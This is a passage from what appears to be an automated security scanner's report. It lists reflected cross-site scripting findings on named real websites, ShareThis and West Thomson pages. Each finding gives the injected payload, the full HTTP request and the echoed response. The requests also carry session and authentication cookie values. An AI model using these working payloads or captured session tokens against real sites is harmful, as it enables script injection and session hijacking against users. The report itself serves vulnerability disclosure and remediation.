The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 9663e<script>alert(1)</script>4a63942b3e0 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/getApi.php?return=json&url=http%3A%2F%2Fwww.computerworlduk.com%2Fnews%2Fsecurity%2F3276305%2Foracle-responds-to-hacker-group-and-patches-javacom-vulnerability%2F%3Folo%3Drss&fpc=8f316ea-12f93c9a01d-4bc8d0c8-1&cb=initWidgetOnSuccess9663e<script>alert(1)</script>4a63942b3e0&service=initWidget HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://edge.sharethis.com/share4x/index.1f60cca3a67f69342fce2ed55af68ca9.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1; __uset=yes

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:52:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 173

initWidgetOnSuccess9663e<script>alert(1)</script>4a63942b3e0({"status":"SUCCESS","data":{"session_token":"3ea745cefeac0fd864be11a335bc6904","require_captcha":1,"ga":true}});

5.175. http://west.thomson.com/support/contact-us/default.aspx [FindingMethod parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /support/contact-us/default.aspx

Issue detail

The value of the FindingMethod request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 970be"style%3d"x%3aexpression(alert(1))"b6e0c02100b was submitted in the FindingMethod parameter. This input was echoed as 970be"style="x:expression(alert(1))"b6e0c02100b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation970be"style%3d"x%3aexpression(alert(1))"b6e0c02100b HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:19:00 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: .WTCAUTH=B612B053E7FF82CE9AE83EB452A041411CF7CB35034F5F59275166074B2D6F9942F4C02C9C6A4752B4EE8BF68E389C72C1EEC5FE403114AD3E025999AD1D3A7D8509CDCBDB9610BFE52B48A5DBA0737F36A325443BB35BCD968D0DCA188F04C3D64497A9C8415EB8225C80F43851731C945453DEB02A102C2975B09929F6C6805BF4A3F18E5E8F4C73AC20E4A75C41A2A78E3438D61F0AFF8143E7411A5A73910C7405229C7448FA582A6DCD1DEE6C9B1DFA606925BBC7B865D777B1C0E2286B6E2D7C4AEE0299D6916D920B569263B589ADEFE279BBD963E96FA9C694FFA7566F5BE5DA; expires=Tue, 26-Apr-2011 20:48:45 GMT; path=/; HttpOnly
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=7C4CE5D28CD27E0D162AF2DADB7CD21AEEAA5F973E30999D1E5A4D12D1E7A8BEE05072991099E4B273E84DC94EF7E2D0ECC8C35F3617EDAA6A78BA5DC99CC24F42A9600AD357B60FE259BA5BB686DC1398365CC6D645DECDC1274E7B64CC02E49984AB3435433883913BE5EA2DE24ECA406761F721A8C0B65091A5961EBD3F5B157F183961120E5B3F35143659B8294DAF1E04123667BA68CE04C9E0F270C0202EB4A9AF77961D42103E9A9FE448DBF40E4181CE35E14A6F1609E7BFCA13B5508749B6651E34DF0147D9DAFF146A52C5A3595FFC96142DA196B03953FEE825AFE4DE1131; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 90968


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><m
...[SNIP]...
a class="EmailPrintContactUsLink" href="javascript:void(0);"
onclick="javascript:PrintThisPage('http://west.thomson.com/support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation970be"style="x:expression(alert(1))"b6e0c02100b'); return false;" >
...[SNIP]...

5.176. http://west.thomson.com/support/contact-us/default.aspx [FindingMethod parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /support/contact-us/default.aspx

Issue detail

The value of the FindingMethod request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3b99"%3balert(1)//ee36c302041 was submitted in the FindingMethod parameter. This input was echoed as c3b99";alert(1)//ee36c302041 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigationc3b99"%3balert(1)//ee36c302041 HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:20:07 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: .WTCAUTH=DA5F527D77095D4E2E7CE1C2E779C0AC51DE6EC75612A9D896AB254F4AC968936082E431775F60E4A9FEC758C7B379B7E9C148FDE7C42E377EC2B94717F34826D37B70C37592A9E326757129576936CF4E5696C22244AF81FCE5CB09ED7602BBCDFB8B9D8BE44DB6B3D1E0E5B294F2E4CBB2303395345B4876632E75245D7E1BDFA1B746DB7B797429DB04AE73B27D0457BD88A682D2CB17C9277B4DF1B0ABC802BC49FDD798F957B2237E83946179DD21D86221CDF3C178A0A3500EB93FF8A840031DDC3926FD0BE588DFBEEF73F6CCA6A46FA61962F170913EC3AB2309DCA46E4E495B; expires=Tue, 26-Apr-2011 20:50:06 GMT; path=/; HttpOnly
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=119B4AA3E7CEF4EE0AC1814985A55E353BAD075BE0EDAB462A85EDE33A9D2ED13D7DBC682CF383E6B8A0F5C95CB3C9CED8DCC5BD767D602A10A7001F04B3C262AD734462DF868F31DCC91DE5353DF87B9618E146A3B7214DA03827251D450B59409F3511481CED0983309492156BED4F1FEF312458F0F6C95EE148C6A1D8F7CE4BE754A2154C8755497A8BB71FE009BC07B22C6AB3F4127F28DA58249113F28376A44DC053E6AAC2FBA81B3BE8E3BC0B38FEE96AD1A6B8F747B3E076747B6481F336006ADA46B431539CE6673FB1569DF55B1092CA333F9AF67C8558BFB787EB33F51883; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 90840


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><m
...[SNIP]...

s.prop8=""
s.prop9=""
s.prop10=""
s.prop11=""
s.prop12=""
s.prop13=""
s.prop14=""
s.prop15=""
s.prop16=""
s.prop17=""
s.prop18=""
s.prop19=""
s.prop20=""
s.prop21=""
s.prop22="Navigationc3b99";alert(1)//ee36c302041"
s.prop23=""
s.prop24=""
s.prop25=""
s.prop26=""
s.prop27="Customer Support"
s.prop28="Contact Us"
s.prop29="Category"
s.prop38=""
/* E-commerce Variables */
s.campaign=""
s.state=""
s.zip
...[SNIP]...

5.177. http://west.thomson.com/support/contact-us/default.aspx [PromCode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /support/contact-us/default.aspx

Issue detail

The value of the PromCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8a66"style%3d"x%3aexpression(alert(1))"2617e1b896b was submitted in the PromCode parameter. This input was echoed as a8a66"style="x:expression(alert(1))"2617e1b896b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /support/contact-us/default.aspx?PromCode=571422a8a66"style%3d"x%3aexpression(alert(1))"2617e1b896b&FindingMethod=Navigation HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:13:05 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=000369DA4A9132554090A7233C8C4843EF17B236BAD3E6EBEA65A8BB0CD2D741506E1421320162A52C3A2A32D9E1279D4B28EC80DE7E9C56A85F6653EAF311A8A70E77BB35F8AFC5922187B9DA5EBFA8BC893AC9D5AF5F3782803FF4909E128E73211A5FC2474F05FA11998DA539BDEF4CE8924724B322089DD11F6FF8957EC4FD085D0E19D914BFC251ACF4C072441E19782B93C32BE38086DCBE32BFF68F2FBC79B02A28E183792BA967437A71EAE07588FE59F65575F0BCDF54EB51520909B86D445EFC3AB2E03332C1CBBB00D37D72DCDFCD215FEF9746931347CC83D4654FE0DECC; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 90921


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><m
...[SNIP]...
<a class="EmailPrintContactUsLink" href="javascript:void(0);"
onclick="javascript:PrintThisPage('http://west.thomson.com/support/contact-us/default.aspx?PromCode=571422a8a66"style="x:expression(alert(1))"2617e1b896b&FindingMethod=Navigation'); return false;" >
...[SNIP]...

5.178. http://west.thomson.com/support/contact-us/default.aspx [PromCode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /support/contact-us/default.aspx

Issue detail

The value of the PromCode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbbd9"%3balert(1)//e1045719b6a was submitted in the PromCode parameter. This input was echoed as cbbd9";alert(1)//e1045719b6a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /support/contact-us/default.aspx?PromCode=571422cbbd9"%3balert(1)//e1045719b6a&FindingMethod=Navigation HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:14:31 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=B5FF2FD0008E83983E00226255A78F21FAA1BC74A78401487F2215DBA44FD3F456976C25CBE9328D216388040278635360938504ADEEBEBEBBDBD2CC39F9B0511B2A66AE979489ED5CBBA08562C2A311FB06A1D0942DD9717FA9E2E0ECBE2F3A8399171FCF52F4401BE9A284D00268CFB8526C03E8BB950EA2191372E82E286F69067BA84001E3EBEE376077985B6B371B92A1320FA3BE317E63DBE1DE2B8B6F72F71F1FA88AB7C3429F9D0E1363E7525D795CF2F879016CB2990E3DD9B88615C1435A3C3E306212B817339FD3679B39180F26487343BD72D47EC86023C2D688CC3A9A8B; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 90812


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><m
...[SNIP]...
<script language="JavaScript">
s.pageName="support:contact-us:default"
s.server="EG-SWGWEB-B01"
s.channel="Standard"
s.pageType=""
s.prop1="571422cbbd9";alert(1)//e1045719b6a"
s.prop2=""
s.prop3=""
s.prop4=""
s.prop5=""
s.prop6=""
s.prop7=""
s.prop8=""
s.prop9=""
s.prop10=""
s.prop11=""
s.prop12=""
s.prop13=""
s.prop14=""
s.prop15=""
s.prop16=""
s.prop17=""
...[SNIP]...

5.179. http://west.thomson.com/support/contact-us/default.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /support/contact-us/default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fdea"style%3d"x%3aexpression(alert(1))"22c4a465138 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8fdea"style="x:expression(alert(1))"22c4a465138 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation&8fdea"style%3d"x%3aexpression(alert(1))"22c4a465138=1 HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:36:50 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 90894


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><m
...[SNIP]...
class="EmailPrintContactUsLink" href="javascript:void(0);"
onclick="javascript:PrintThisPage('http://west.thomson.com/support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation&8fdea"style="x:expression(alert(1))"22c4a465138=1'); return false;" >
...[SNIP]...

5.180. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx [FindingMethod parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://west.thomson.com
Path:   /store/Promotions/EmailPreferences/Login.aspx

Issue detail

The value of the FindingMethod request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54b8b"%3balert(1)//787512fed9c was submitted in the FindingMethod parameter. This input was echoed as 54b8b";alert(1)//787512fed9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419&FindingMethod=Navigation54b8b"%3balert(1)//787512fed9c HTTP/1.1
Host: west.thomson.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:19:23 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: .WTCAUTH=02C7CBCD3A55EA9D27EB48E3569CAAC75DD12D0163E2A96333E37FCB92A89FEF22C4CDA18B63632293AFEC4F9CFD9C9C97E5682A7E60915FAFE192F03575061A2C1F7D23CCA0E7ED605E5F5492180F4426EFF8A8783D7A5E3381ECAE88D68155FBEACC8E2DB7BD8240E1093D7DDB51C0888024E7EB20CDB935C5FCC0F5D92DB1CC5DCB37E7C43A7D6F70F845E5734B30C7F12D40B5DFFBB8E01E6F438077AE71F0FE7F41C48E13EDD3F02AACF65617502C96EB6EC12E55699539259D0C264204C410CDAD3E75333C6721A7A6E6E94D6AA711D0C756D8E790683D527B3A2C30135392CEA3; expires=Tue, 26-Apr-2011 20:49:18 GMT; path=/; HttpOnly
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=414B02C5FC8E636C3842D4E8FB2372CAB30A2B20D50B5F64F0864744264CC3321EE01EB9F8ECEFEFF72029FB375BC1EE012B3C3CB5BD9084715C8557C0195E468F8D058B79FF0FA94B651F6BA4D955161968DD96B238CF4BA68FA87855F6280BBC307E13A3A869A3F22834DF744FD3EF61E895A6BDD889522E126D0F79E1B51ECFC721C2612227EE07A17FAB126B1ED6F3DB4C601A1A5885C9CD6F6FA589BF4774CF9D406ED0F26CAD669AC1C6CF18A98465B4573A6F6B0B3B38E7B68FBE5819CDD10DB57EBF972D5551EEC0D374718621BC73ED4771BA20AF903833569BC0950443C88C; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 69814


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...

s.prop8=""
s.prop9=""
s.prop10=""
s.prop11=""
s.prop12=""
s.prop13=""
s.prop14=""
s.prop15=""
s.prop16=""
s.prop17=""
s.prop18=""
s.prop19=""
s.prop20=""
s.prop21=""
s.prop22="Navigation54b8b";alert(1)//787512fed9c"
s.prop23=""
s.prop24=""
s.prop25=""
s.prop26=""
s.prop27=""
s.prop28=""
s.prop29=""
s.prop38=""
/* E-commerce Variables */
s.campaign=""
s.state=""
s.zip=""
s.events=""

s.products=""
...[SNIP]...

5.181. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx [PromCode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://west.thomson.com
Path:   /store/Promotions/EmailPreferences/Login.aspx

Issue detail

The value of the PromCode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 749d9"%3balert(1)//72d68614b4 was submitted in the PromCode parameter. This input was echoed as 749d9";alert(1)//72d68614b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419749d9"%3balert(1)//72d68614b4&FindingMethod=Navigation HTTP/1.1
Host: west.thomson.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
